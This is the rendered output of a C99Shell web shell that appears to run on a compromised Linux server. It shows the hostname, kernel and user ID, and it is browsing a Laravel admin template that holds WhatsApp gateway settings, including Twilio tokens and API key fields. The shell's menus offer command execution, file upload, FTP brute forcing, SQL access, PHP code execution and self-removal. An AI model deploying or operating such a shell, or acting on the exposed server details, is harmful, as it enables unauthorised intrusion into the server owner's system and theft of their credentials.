!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/sms.picotech.app/public_html/resources/views/admin/settings/   drwxr-xr-x
Free 29.38 GB of 117.98 GB (24.91%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     whatsapp_api.blade.php (2.08 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

@php

    $textlocal=json_decode(get_settings('whatsapp_textlocal'));
    $twilio=json_decode(get_settings('whatsapp_twilio'));
    $soniyal=json_decode(get_settings('whatsapp_soniyal'));
@endphp
<div class="form-group">
    <label for="gateway">@lang('admin.settings.gateway')</label>
    <select required class="form-control select2" style="width: 100%" name="whatsapp_gateway" id="whatsapp_gateway">
        <option value="whatsapp_twilio">Twilio</option>
        <option value="whatsapp_textlocal">TextLocal</option>
        <option value="whatsapp_soniyal">Soniyal</option>
    </select>
</div>
<div id="whatsapp_twilio_section" class="whatsapp-api-section">
    <div class="form-group">
        <label for="tw_sid">@lang('admin.settings.sid')</label>
        <input required value="{{isset($twilio->tw_sid)?$twilio->tw_sid:''}}" class="form-control" type="text" name="tw_sid">
    </div>
    <div class="form-group">
        <label for="tw_token">@lang('admin.settings.token')</label>
        <input required value="{{isset($twilio->tw_token)?$twilio->tw_token:''}}" class="form-control" type="text" name="tw_token">
    </div>
</div>
<div id="whatsapp_textlocal_section" class="whatsapp-api-section"  style="display: none">
    <div class="form-group">
        <label for="project_id">{{trans('admin.settings.api_key')}}</label>
        <input required value="{{isset($textlocal->textlocal_api_key)?$textlocal->textlocal_api_key:''}}" class="form-control" type="text" name="textlocal_api_key" >
    </div>

</div>
<div id="whatsapp_soniyal_section" class="whatsapp-api-section"  style="display: none">
    <div class="form-group">
        <label for="soniyal_api_key">{{trans('admin.settings.api_key')}}</label>
        <input required value="{{isset($soniyal->soniyal_api_key)?$soniyal->soniyal_api_key:''}}" class="form-control" type="text" name="soniyal_api_key" >
    </div>
    <div class="form-group">
        <label for="soniyal_url">@lang('URL')</label>
        <input required value="{{isset($soniyal->soniyal_url)?$soniyal->soniyal_url:''}}" class="form-control" type="text" name="soniyal_url" >
    </div>
</div>




:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0034 ]--